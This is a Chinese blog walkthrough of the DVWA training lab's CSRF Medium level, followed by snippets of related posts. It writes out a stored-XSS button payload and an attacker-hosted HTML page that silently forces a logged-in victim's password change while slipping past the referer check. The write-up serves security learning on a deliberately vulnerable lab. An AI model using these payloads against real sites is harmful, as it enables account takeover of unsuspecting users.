DVWA—CSRF-Medium跨站请求伪造中级

原创 已于 2023-03-17 11:20:59 修改
· 923 阅读 · 4 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#csrf #安全 #前端

于 2023-02-09 19:23:18 首次发布
该文章详细介绍了如何在面临XSS(Stored)和过滤问题时,利用button标签和JavaScript来构造跨站请求伪造(CSRF)攻击,绕过长度限制和referer检查,从而实现修改密码的目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

注意:

1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK

2、把难度设置成  Medium

 一、这一关同样我们需要埋下伏笔,诱使用户点击来提交,首先从XSS(Stored)入手。

       注意:在前面介绍过如何进行XSS注入,这里就不再讲解。http://t.csdn.cn/gs8xX

二、在上low难度中,我们直接使用<a>标签来包裹修改密码的请求。但这一关<a>标签被过滤了。

所以,我们使用的是button标签来提交修改密码的链接。

<button Onclick="alert(11)">点我</button>

简单查看效果,可以触发

三、接下来是不是就简单了,在这里使用 location.href=“”  来提交类似第一关修改密码的GET请求不就ok?

构造payload:(注意这里的ip是web服务器的ip后面不要混淆)

<button Onclick=location.href="http://192.168.114.165/vulnerabilities/csrf/?password_new=9999&password_conf=9999&Change=Change">拿下</button>

解析:就是当用户点击这个按钮的时候,会自动提交一个修改密码的get请求,来修改当前用户的密码。 No matter who you are!

 注入,并查看结果:(经过验证确实在字符串的长度被限制了!)

        

四、所以果真没那么简单,话不多说直接看答案。

提示:

源码:

 用人话是这样说:

        1、第一关把整个GET请求藏进去没办法——长度限制

        2、需要多个连接来实现——不然怎么叫跨站呢?思路讲就是点击按钮让页面跳转到我在其他服务器(114.199)准备好的一个页面,用这个页面来向114.165服务器来提交GET请求。

        3、但是!从源码可以看到,这里有一个referer,比如我们用114.199服务器提交GET请求的时候,referer的ip会是114.199。所以也不会提交成功。

        4、所以我们要绕过referer。

五、首先在114.199服务器上面创建一个chage_192.168.114.165.html      的文件,用来绕过referer。这里的IP是靶场的IP。内容如下:

<script>
    // 向web服务器提交请求 
    function onlo(){
        location.href="http://192.168.114.165/vulnerabilities/csrf/?password_new=12581&password_conf=12581&Change=Change";
    }
</Script>
<body onload="onlo()">

解析:这个就相当于跨站脚本通过,当用户跳转到这个页面,这个页面马上就向Web靶场服务器一个修改密码的请求。来完成密码修改。

六、接下来构造payload

<button Onclick=location.href="http://192.168.114.199/change_192.168.114.165.html">拿下</button>

#注意修改IP地址。href=服务器上部署的那个脚本连接。

埋下伏笔!

 单击拿下,抓包查看。

 

 

拿下!

 

DVWA_CSRF_medium
qq_45434762的博客
01-09 883
1.通过查看源代码发现后端程序验证了Referer,所以在构造CSRF数据包时需要指定Referer的值, 2.在修改密码页面填入新密码进行提交,使用BurpSuit进行抓包拦截。并构造CSRF POC 3.构造好CSRF POC之后,在浏览器中进行测试 4.使用BurpSuit拦截数据包,对Referer值进行修改,使其不为一...
DVWA靶场-CSRF跨站请求伪造
mlws1900的博客
03-15 1719
CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。设置了token限制,它是在每次访问此页面时,会随机生成一个token,当发起服务器请求时服务器会检查它的值。执行恶意操作,如修改密码,购买商品,转账等(盗用受害者身份,受害者能做什么攻击者就能以受害者身份)
DVWA笔记之三:CSRF
weixin_30799995的博客
08-14 172
CSRF与XSS不同,它称为跨站请求伪造,它是利用其他页面的恶意脚本来加载访问或操作存在CSRF的漏洞的可信网站。 1.Low级别 核心代码如下: <?php if(isset($_GET['Login'])){ //Getusername $user=$_GET['username']; //Getpassword ...
新手指南:DVWA全级别教程之CSRF
g695144224的博客
08-09 2935
转自:http://www.freebuf.com/articles/web/118352.html DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brute
代码审计—DVWACSRFMedium
王嘟嘟的博客
10-30 523
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 内容 2018年10月30日00:28:09 想至少把Medium看完,不敢不甘心呀。希望隔壁能晚点睡。 0x01 start 1.黑盒 好吧,我黑盒不出来,我承认。白盒测试。我还是太菜了。 2.白盒 $_SERVER[ ...
DVWA教程(二)——Medium级别
weixin_47610939的博客
07-12 620
dvwa中级难度通关指南
DVWA-CSRF跨站请求伪造 Medium和Low级别
xmj818719的博客
02-27 399
1代码分析 过滤条件 if( stripos( $SERVER[ 'HTTP_REFERER' ] ,$SERVER[ 'SERVER_NAME' ]) !== false ) 判断,$SERVER[ 'SERVER_NAME' ]在 $SERVER[ 'HTTP_REFERER' ] 中是否存在,寻找第一次出现的地址 $_SERVER[ ' SERVER_NAME' ] 网站的地址 192.168.0.9 $_SERVER[ 'HTTP_REFERER' ] 请求发起着地址 192.1.
DVWACSRF跨站请求伪造实战
平凡
11-25 925
不为圣贤,便为禽兽;莫问收获,但问耕耘。
DVWA靶场通关----(三)CSRF
m0_74977101的博客
02-04 848
攻击者诱骗用户浏览器向目标网站发送一个“伪造请求”(如转账、修改密码),利用用户已登录的会话权限完成恶意操作。
DVWA通关攻略之跨站请求伪造
勿山几已
05-12 618
介绍CSRF攻击并简单演示攻击过程。
DVWA系列CSRF
crystal919的博客
03-25 514
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是...
DVWACSRF详解
qq_43665434的博客
03-03 1462
DVWACSRF 一、low级别 1、测试流程 如图,输入一次新密码和一次确认新密码就可更改密码,并没有索要旧密码进行验证。 用burp抓包看一下: 发现是get请求,而且并没有token,所以明显存在CSRF漏洞。 伪造一个请求链接: http://222.24.28.118/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change 将password_new和passw
CSRF跨站请求伪造
kkaicc5200714的博客
04-09 193
CSRF跨站请求伪造 原理总结: 一个CSRF漏洞攻击的实现,其需要由“三个部分”来构成 1,有一个漏洞存在(无需验证,任意修改后台数据,新增请求) 2,伪装数据操作请求的恶意链接或者页面 3,诱使用户主动访问或登录恶意链接,触发非法操作 第一部分 漏洞的存在 关键字:跨站请求漏洞(CSR:Cross Site Request) 如果需要CSRF攻击能够成功,首先就需要目标站点或系统存在一个可以进行数据修改或者新增操作,且此操作被提交后台后的过程中,其未提供任何身份识别或校验的参数,后台只要收到请求,就立即
DVWACSRF
GVFDBDF的专栏
09-05 1147
1、源码审计(low级别)                      if (isset($_GET['Change'])) {              // Turn requests into variables         $pass_new = $_GET['password_new'];         $pass_conf = $_GET['passwor
DVWACSRF攻击(Low&medium&High)
liweibin812的博客
01-14 5445
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在20...
DVWA - CSRF (low, medium, high)
无节操
01-06 3594
low设置一下cookie的PHPSESSID和security即可跨站请求import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngk
DVWA--CSRF详解
洋洋的小黑屋
01-04 2343
CSRF概念: CSRF跨站请求伪造,黑客诱导用户点击带有伪造请求(修改密码,转账,删除文章等高风险操作请求)链接后,利用未失效的用户认证信息,产生服务器验证请求通过,导致用户在不知名的情况下进行了转账等操作。 与XSS的区别: XSS是通过修改页面Javascript等代码后,发给用户从而实现盗取cookie信息,之后利用cookie进行登陆网站等操作。非法操作是黑客。 CSRF并没有盗取coo...
DVWA-csrf
告白的博客
07-28 493
0x00 漏洞介绍 CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web应用程序,去执行并非用户本意的操作。 用户登录、浏览并信任正规网站WebA,同时,WebA通过用户的验证并在用户的浏览器中产生Cookie。 简单理解:将即将支付网址连接盗取,将伪造站点操作代码放在csrf伪造站点,当点击伪造站点自动
DVWA】13. CSRF(Low+Medium
Zichel77的博客
12-19 1063
应该对用户输入进行适当的验证和过滤,如检查密码长度、使用安全的密码哈希算法等。代码检查了保留变量HTTP_REFERER (http包头部的Referer字段的值,表示来源地址)是否包含SERVER_NAME(http包头部的 Host 字段表示要访问的主机名)。未防止 SQL 注入: 代码中直接将用户输入的密码插入到 SQL 查询语句中,存在 SQL 注入的风险。未防止 SQL 注入: 代码中直接将用户输入的密码插入到 SQL 查询语句中,存在 SQL 注入的风险。
DVWA CSRF
最新发布
03-13
<think>好的,我现在需要回答用户关于DVWACSRF漏洞的示例和防护方法的问题。首先,我得回忆一下DVWA是什么,以及CSRF漏洞的基本概念。DVWA(Damn Vulnerable Web Application)是一个用于安全训练的应用,包含多种漏洞,方便学习渗透测试和防护方法。CSRF(Cross-Site Request Forgery)跨站请求伪造,攻击者诱使用户在已认证的情况下执行非预期的操作。 接下来,用户需要具体的漏洞示例和防护方法。我应该先解释DVWA中的CSRF漏洞实例,可能是在哪个安全级别下,比如Low级别可能存在未防护的CSRF,比如修改密码的功能没有验证请求来源或使用Token。然后,防护方法通常包括使用CSRF Token、验证Referer头、SameSite Cookie属性等。 需要确保回答结构清晰,分点说明。同时,用户提到参考了《磐石计划:Web安全漏洞与渗透测试》的笔记,所以可能需要引用相关内容,比如在防护方法中提到相关的最佳实践。此外,生成相关问题时要与CSRFDVWA相关,可能涉及漏洞原理、不同安全级别的防护措施对比,以及如何利用漏洞进行渗透测试的步骤。 还要注意使用中文,数学公式用$...$,独立公式用$$...$$,但这里可能不太需要数学公式,但如果有涉及参数或算法,可能需要使用。例如,在解释Token生成时,如果有随机数生成,可以用公式表示,如生成Token的算法:$token = hash(session\_id + secret\_key)$,不过这可能不需要,视情况而定。 需要检查是否所有行内代码和术语正确,比如CSRF的正确拼写,DVWA的各个级别设置,比如Low、Medium、High的安全配置差异。例如,在Low级别下,DVWACSRF可能没有任何防护,而Medium可能检查Referer,High级别使用Token验证。 最后,生成的相关问题应围绕CSRF的扩展,比如其他防护措施、不同安全级别的实现差异、实际案例等。确保问题对用户有帮助,引导深入学习。 现在整理回答结构:先介绍CSRF漏洞在DVWA中的示例,分不同安全级别说明;然后详细说明防护方法,每个方法如何实施;最后生成相关问题。同时引用提供的参考内容,比如在防护措施中提到遵守国家规定,引用[^1]。</think>### DVWA中的CSRF漏洞示例及防护方法 #### 1. CSRF漏洞示例(以DVWA的Low级别为例) 在DVWA的“CSRF”模块中,Low安全级别的密码修改功能未采取任何防护措施。攻击者可构造恶意链接,诱使用户点击后自动提交密码修改请求。例如,以下URL可直接修改用户密码(假设用户已登录): ``` http://localhost/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change# ``` 由于请求未验证来源或使用Token,用户点击后密码会被修改为`123`[^1]。 #### 2. 防护方法 - **CSRF Token验证** 服务端生成随机Token并嵌入表单,提交时验证Token有效性。例如: ```html <input type="hidden" name="token" value="<?php echo generate_token(); ?>"> ``` Token生成逻辑可设计为:$$ \text{Token} = \text{Hash}(\text{SessionID} + \text{SecretKey}) $$ - **验证Referer头** 检查请求头中的`Referer`是否来自合法域名,但需注意某些浏览器可能禁用Referer。 - **SameSite Cookie属性** 设置Cookie的`SameSite=Strict`或`Lax`,限制跨站请求携带Cookie: ```php setcookie("session_id", $value, ["samesite" => "Strict"]); ``` - **二次验证** 敏感操作(如密码修改)需用户二次输入原密码或验证码。 #### 3. DVWA不同安全级别的防护差异 - **Medium级别**:检查`Referer`是否包含主机名,但仍可被绕过。 - **High级别**:强制使用CSRF Token,且Token与会话绑定,无法伪造---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值